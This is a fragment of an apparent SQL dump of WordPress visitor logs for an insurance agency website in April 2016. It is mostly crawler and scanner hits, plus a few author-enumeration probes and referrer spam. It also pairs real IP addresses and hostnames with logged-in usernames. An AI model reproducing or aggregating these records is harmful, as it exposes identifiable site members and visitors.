49','us','','','','','','','0','0',0),(19727,'0b_cafddaa5dca2d8faee98489ba61edee4','1461186752','151.138.13.244','151.138.13.244','/','SuperPagesUrlVerifyBot/1.0','','',0,'','','','','','SuperPagesUrlVerifyBot','','','','0','0',0),(19730,'0b_ccd186a088a5bfccfa6abaa8b8533217','1461187759','47.23.66.242','ool-2f1742f2.static.optonline.net','/contact/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','http://www.empireins.com/term-quotes/','',0,'Win7','IE 9','us','1440 x 900','','','','hkellner','','0','0',0),(19733,'0b_ccd186a088a5bfccfa6abaa8b8533217','1461187848','47.23.66.242','ool-2f1742f2.static.optonline.net','/agent-tools/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','http://www.empireins.com/members/','',0,'Win7','IE 9','us','1440 x 900','','','','hkellner','','0','51',0),(19734,'0b_ccd186a088a5bfccfa6abaa8b8533217','1461187848','47.23.66.242','ool-2f1742f2.static.optonline.net','/members/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','http://www.empireins.com/?page_id=171?a=pwdreset','',0,'Win7','IE 9','us','1440 x 900','','','','hkellner','','0','51',0),(19736,'0b_ccd186a088a5bfccfa6abaa8b8533217','1461187849','47.23.66.242','ool-2f1742f2.static.optonline.net','/term-quotes/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','http://www.empireins.com/agent-tools/','',0,'Win7','IE 9','us','1440 x 900','','','','hkellner','','0','51',0),(19739,'0b_ccd186a088a5bfccfa6abaa8b8533217','1461187853','47.23.66.242','ool-2f1742f2.static.optonline.net','/agent-tools/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','http://www.empireins.com/agent-tools/','',0,'Win7','IE 9','us','1440 x 900','','','','hkellner','','0','51',0),(19742,'0b_ccd186a088a5bfccfa6abaa8b8533217','1461187863','47.23.66.242','ool-2f1742f2.static.optonline.net','/term-quotes/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','http://www.empireins.com/agent-tools/','',0,'Win7','IE 9','us','1440 x 900','','','','hkellner','','0','51',0),(19743,'0b_59f82f83d14082746153ec0913fd468a','1461191236','157.55.39.140','msnbot-157-55-39-140.search.msn.com','[404] /pdf/axa_accepts_your_smokers.pdf','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(19746,'0b_3f55c523b290670e38a743c71d5ca63a','1461192536','198.211.25.102','102-25-211-198-dedicated.multacom.com','/','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)','','',0,'WinXP','IE 7','us','','','','','','','0','0',0),(19749,'0b_f111e013f8ebe9957fd8da14599b9ac9','1461193169','180.76.15.21','baiduspider-180-76-15-21.crawl.baidu.com','/robots.txt','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','','',0,'WinXP','Firefox 6','cn','','','Baiduspider','','','','0','0',0),(19751,'0b_7bd2cf912a8397255a88e289bf2cffeb','1461193532','5.248.253.133','5-248-253-133-broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)','http://vilingstore.net/','',0,'Windows','IE 6','','','','','','','','0','0',0),(19752,'0b_7bd2cf912a8397255a88e289bf2cffeb','1461193532','5.248.253.133','5-248-253-133-broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)','http://vilingstore.net/','',0,'Windows','IE 6','','','','','','','','0','0',0),(19754,'0b_e20efbd0fdbcd3ef884b2c087adab59e','1461194361','138.201.52.72','static.72.52.201.138.clients.your-server.de','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','','',0,'WinXP','IE 6','de','','','','','','','0','0',0),(19757,'0b_42e2753e6bba1ebb4e734ca514cd0a39','1461194960','66.249.64.24','crawl-66-249-64-24.googlebot.com','/quotes.htm','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'Android','','','','','Googlebot-Mobile','','','','0','0',0),(19758,'0b_b8bf39a931fa2ba18e99fae778800750','1461197289','173.234.153.123','173.234.153.123.rdns.ubiquity.io','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','io','','','MJ12bot','','','','0','0',0),(19760,'0b_b8bf39a931fa2ba18e99fae778800750','1461197291','173.234.153.123','173.234.153.123.rdns.ubiquity.io','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','io','','','MJ12bot','','','','0','0',0),(19761,'0b_0db0bb66c55f5bd05ee782b0eaa56ab1','1461198770','207.46.13.2','msnbot-207-46-13-2.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(19764,'0b_c642d880e70219cb161b7ae51c0e113a','1461199283','157.55.39.204','msnbot-157-55-39-204.search.msn.com','/paramed.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(19767,'0b_87144ef4b9eff7ab77aa0abfe03bb228','1461199361','69.30.215.26','69.30.215.26','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(19770,'0b_87144ef4b9eff7ab77aa0abfe03bb228','1461199372','69.30.215.26','69.30.215.26','/about-us/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(19772,'0b_87144ef4b9eff7ab77aa0abfe03bb228','1461199383','69.30.215.26','69.30.215.26','/igo/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(19773,'0b_87144ef4b9eff7ab77aa0abfe03bb228','1461199397','69.30.215.26','69.30.215.26','/insentives/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(19775,'0b_87144ef4b9eff7ab77aa0abfe03bb228','1461199408','69.30.215.26','69.30.215.26','/licensing-contracting/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(19778,'0b_87144ef4b9eff7ab77aa0abfe03bb228','1461199420','69.30.215.26','69.30.215.26','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(19781,'0b_e69bef7920c257ded0c5261c52a73476','1461200259','66.249.64.29','crawl-66-249-64-29.googlebot.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(19782,'0b_54e26c235dc98753e37ff4cb2184b6c5','1461203938','180.76.15.11','baiduspider-180-76-15-11.crawl.baidu.com','/robots.txt','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','','',0,'WinXP','Firefox 6','cn','','','Baiduspider','','','','0','0',0),(19785,'0b_5f69e190c40e7db0da0d03b40eb241ec','1461210344','184.152.70.9','cpe-184-152-70-9.nyc.res.rr.com','/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','us','1600 x 900','','','','','','0','0',0),(19788,'0b_5f69e190c40e7db0da0d03b40eb241ec','1461210346','184.152.70.9','cpe-184-152-70-9.nyc.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1600 x 900','','','','','','0','0',0),(19791,'0b_5f69e190c40e7db0da0d03b40eb241ec','1461210434','184.152.70.9','cpe-184-152-70-9.nyc.res.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1600 x 900','','','','','','0','0',0),(19793,'0b_117d26c694405b6d18461168e8e78b97','1461212441','100.43.90.9','spider-100-43-90-9.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(19794,'0b_117d26c694405b6d18461168e8e78b97','1461212442','100.43.90.9','spider-100-43-90-9.yandex.com','/contact/feed/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(19797,'0b_117d26c694405b6d18461168e8e78b97','1461212446','100.43.90.9','spider-100-43-90-9.yandex.com','/members/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(19799,'0b_48b5eab7a7695b402a1d75b603f1c39c','1461215339','198.23.174.143','198-23-174-143-host.colocrossing.com','/','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.85 Safari/537.36','http://www.empireins.com/','',0,'Win7','Google Chrome','us','','','','','','','0','0',0),(19800,'0b_4abfbafb6c76fe87e5db8d55abac6628','1461216000','46.165.197.142','46.165.197.142','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(19802,'0b_4abfbafb6c76fe87e5db8d55abac6628','1461216013','46.165.197.142','46.165.197.142','/companylinks.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(19805,'0b_48d47cf50cf2e433b7a2022ed2bcf7ea','1461223320','45.79.89.188','li1188-188.members.linode.com','/robots.txt','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','','',0,'','','','','','Uptimebot','','','','0','0',0),(19808,'0b_04692e2cd6c7bcb32e5e1e225bf82de0','1461224872','46.118.156.3','sol-fttb.3.156.118.46.sovam.net.ua','/','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)','http://www.lego4x4.ru/','',0,'WinXP','IE 7','ua','','','','','','','0','0',0),(19809,'0b_cbdff5917aefbe7a2829bc3e1954691f','1461224872','46.118.156.3','sol-fttb.3.156.118.46.sovam.net.ua','/','Mozilla/6.0 (compatible; MSIE 7.0a1; Windows NT 5.2; SV1)','http://special-porn.com/','',0,'Win2003','IE 7','ua','','','','','','','0','0',0),(19811,'0b_ed4859e6126fa4517a0ad978fdca8db3','1461224965','134.249.55.100','134-249-55-100-broadband.kyivstar.net','/','Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.01','http://dokumentalkino.net/','',0,'WinXP','Opera 8','us','','','','','','','0','0',0),(19814,'0b_b2514f5c8081000620efe8dd9742a241','1461224986','134.249.55.100','134-249-55-100-broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 4.0) Opera 7.0 [en]','http://tmm-kurs.ru/','',0,'WinNT 4.0','Opera 7','us','','','','','','','0','0',0),(19815,'0b_db97d9fd3ecdcf2dd7a48596f624e996','1461225016','134.249.55.100','134-249-55-100-broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0 ; .NET CLR 2.0.50215; SL Commerce Client v1.0; Tablet PC 2.0','http://allsilver925.co.il/','',0,'WinVista','IE 7','','','','','','','','0','0',0),(19818,'0b_8270e5f0f7b462394d6ba1dac980f61f','1461225494','178.137.90.202','178-137-90-202-lvv.broadband.kyivstar.net','/','Opera/9.00 (Windows NT 4.0; U; en)','http://prombudpostach.com.ua/','',0,'WinNT 4.0','Opera 9','us','','','','','','','0','0',0),(19821,'0b_35e34927a0132f534fce82b49c214060','1461225494','178.137.90.202','178-137-90-202-lvv.broadband.kyivstar.net','/','Mozilla/4.7 (compatible; OffByOne; Windows 2000) Webster Pro V3.4','http://gazobeton-p.com.ua/','',0,'Win2000','OffByOne','','','','','','','','0','0',0),(19823,'0b_562102f0d522ef444413f6b9cc2de93b','1461233998','134.249.55.100','134-249-55-100-broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)','http://call-of-duty.info/','',0,'WinXP','IE 7','','','','','','','','0','0',0),(19826,'0b_562102f0d522ef444413f6b9cc2de93b','1461233998','134.249.55.100','134-249-55-100-broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)','http://call-of-duty.info/','',0,'WinXP','IE 7','','','','','','','','0','0',0),(19827,'0b_783a47a81268e72af4bd609e5544431b','1461237387','91.247.145.59','91.247.145.59','/?author=1','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(19829,'0b_783a47a81268e72af4bd609e5544431b','1461237387','91.247.145.59','91.247.145.59','/?author=0','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(19830,'0b_710cca8ff920d39a80d86e26ccc9dde9','1461238636','207.46.13.29','msnbot-207-46-13-29.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(19833,'0b_9b9a9fdbb8e4c5239e24dcc6d2bdba87','1461240428','40.77.167.63','msnbot-40-77-167-63.search.msn.com','/left.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(19836,'0b_e63063e138ee8ae5227101185049e5a8','1461243514','157.55.39.237','msnbot-157-55-39-237.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(19839,'0b_e6fcee1d2e26dce50230a699e42683a6','1461245306','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(19841,'0b_e6fcee1d2e26dce50230a699e42683a6','1461245308','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(19842,'0b_7b550d32583aa025c5b4ab4b77693ec9','1461245369','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(19845,'0b_7b550d32583aa025c5b4ab4b77693ec9','1461245395','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(19847,'0b_19820c878ea87b79e92a4923d923f6d8','1461245710','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(19848,'0b_19820c878ea87b79e92a4923d923f6d8','1461246620','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(19850,'0b_19820c878ea87b79e92a4923d923f6d8','1461246621','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(19853,'0b_26de898c920f4de9cda3be2b0565d558','1461246917','173.169.205.241','173-169-205-241.res.bhn.net','/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win10','Chrome 49','us','1366 x 768','','','','','','0','0',0),(19854,'0b_26de898c920f4de9cda3be2b0565d558','1461246919','173.169.205.241','173-169-205-241.res.bhn.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 49','us','1366 x 768','','','','','','0','0',0),(19856,'0b_26de898c920f4de9cda3be2b0565d558','1461246932','173.169.205.241','173-169-205-241.res.bhn.net','/contact/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 49','us','1366 x 768','','','','','','0','0',0),(19859,'0b_26de898c920f4de9cda3be2b0565d558','1461246945','173.169.205.241','173-169-205-241.res.bhn.net','/about-us/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/contact/','',0,'Win10','Chrome 49','us','1366 x 768','','','','','','0','51',0),(19862,'0b_4c66309061ad3ef3e45394f949f1a59f','1461247777','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(19865,'0b_299771752ecc0ac76f79a20397f78207','1461247782','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','0',0),(19866,'0b_299771752ecc0ac76f79a20397f78207','1461247790','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(19868,'0b_299771752ecc0ac76f79a20397f78207','1461247794','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(19871,'0b_299771752ecc0ac76f79a20397f78207','1461251138','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/forms/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(19872,'0b_299771752ecc0ac76f79a20397f78207','1461251265','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(19874,'0b_299771752ecc0ac76f79a20397f78207','1461251269','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(19877,'0b_299771752ecc0ac76f79a20397f78207','1461251273','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(19878,'0b_f29a33f9cdf645ec3de0f29c57f552b5','1461251278','69.175.67.58','newscan04.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(19881,'0b_f29a33f9cdf645ec3de0f29c57f552b5','1461251281','69.175.67.58','newscan04.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(19883,'0b_f29a33f9cdf645ec3de0f29c57f552b5','1461251283','69.175.67.58','newscan04.sitelock.com','/carriers/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(19884,'0b_f29a33f9cdf645ec3de0f29c57f552b5','1461251286','69.175.67.58','newscan04.sitelock.com','/insentives/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(19887,'0b_f29a33f9cdf645ec3de0f29c57f552b5','1461251288','69.175.67.58','newscan04.sitelock.com','/agent-tools/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(19889,'0b_f29a33f9cdf645ec3de0f29c57f552b5','1461251290','69.175.67.58','newscan04.sitelock.com','/case-status/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(19892,'0b_f29a33f9cdf645ec3de0f29c57f552b5','1461251292','69.175.67.58','newscan04.sitelock.com','/term-quotes/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(19893,'0b_f29a33f9cdf645ec3de0f29c57f552b5','1461251295','69.175.67.58','newscan04.sitelock.com','/licensing-contracting/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(19895,'0b_f29a33f9cdf645ec3de0f29c57f552b5','1461251297','69.175.67.58','newscan04.sitelock.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(19896,'0b_f29a33f9cdf645ec3de0f29c57f552b5','1461251299','69.175.67.58','newscan04.sitelock.com','/term-quotes/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(19899,'0b_f29a33f9cdf645ec3de0f29c57f552b5','1461251301','69.175.67.58','newscan04.sitelock.com','/comments/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(19901,'0b_f29a33f9cdf645ec3de0f29c57f552b5','1461251303','69.175.67.58','newscan04.sitelock.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(19904,'0b_fb88520e94e7a48a2f9c0b16c57aa9d9','1461251305','69.175.67.58','newscan04.sitelock.com','/?p=185','SiteLockSpider [en] (WinNT; I ;Nav)','','',0,'WinNT','','','','','SiteLockSpider','','','','3','0',0),(19907,'0b_f29a33f9cdf645ec3de0f29c57f552b5','1461251305','69.175.67.58','newscan04.sitelock.com','/about-us/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(19908,'0b_fb88520e94e7a48a2f9c0b16c57aa9d9','1461251307','69.175.67.58','newscan04.sitelock.com','/?page_id=169','SiteLockSpider [en] (WinNT; I ;Nav)','','',0,'WinNT','','','','','SiteLockSpider','','','','3','0',0),(19910,'0b_f29a33f9cdf645ec3de0f29c57f552b5','1461251309','69.175.67.58','newscan04.sitelock.com','/register/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(19911,'0b_fb88520e94e7a48a2f9c0b16c57aa9d9','1461251312','69.175.67.58','newscan04.sitelock.com','/?page_id=171?a=pwdreset','SiteLockSpider [en] (WinNT; I ;Nav)','','',0,'WinNT','','','','','SiteLockSpider','','','','3','0',0),(19913,'0b_f29a33f9cdf645ec3de0f29c57f552b5','1461251313','69.175.67.58','newscan04.sitelock.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(19914,'0b_f29a33f9cdf645ec3de0f29c57f552b5','1461251315','69.175.67.58','newscan04.sitelock.com','/igo/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(19917,'0b_f29a33f9cdf645ec3de0f29c57f552b5','1461251318','69.175.67.58','newscan04.sitelock.com','/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(19919,'0b_f29a33f9cdf645ec3de0f29c57f552b5','1461251328','69.175.67.58','newscan04.sitelock.com','/home/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(19922,'0b_f29a33f9cdf645ec3de0f29c57f552b5','1461251330','69.175.67.58','newscan04.sitelock.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(19925,'0b_f29a33f9cdf645ec3de0f29c57f552b5','1461251333','69.175.67.58','newscan04.sitelock.com','/contact/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(19928,'0b_f29a33f9cdf645ec3de0f29c57f552b5','1461251335','69.175.67.58','newscan04.sitelock.com','/members/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown 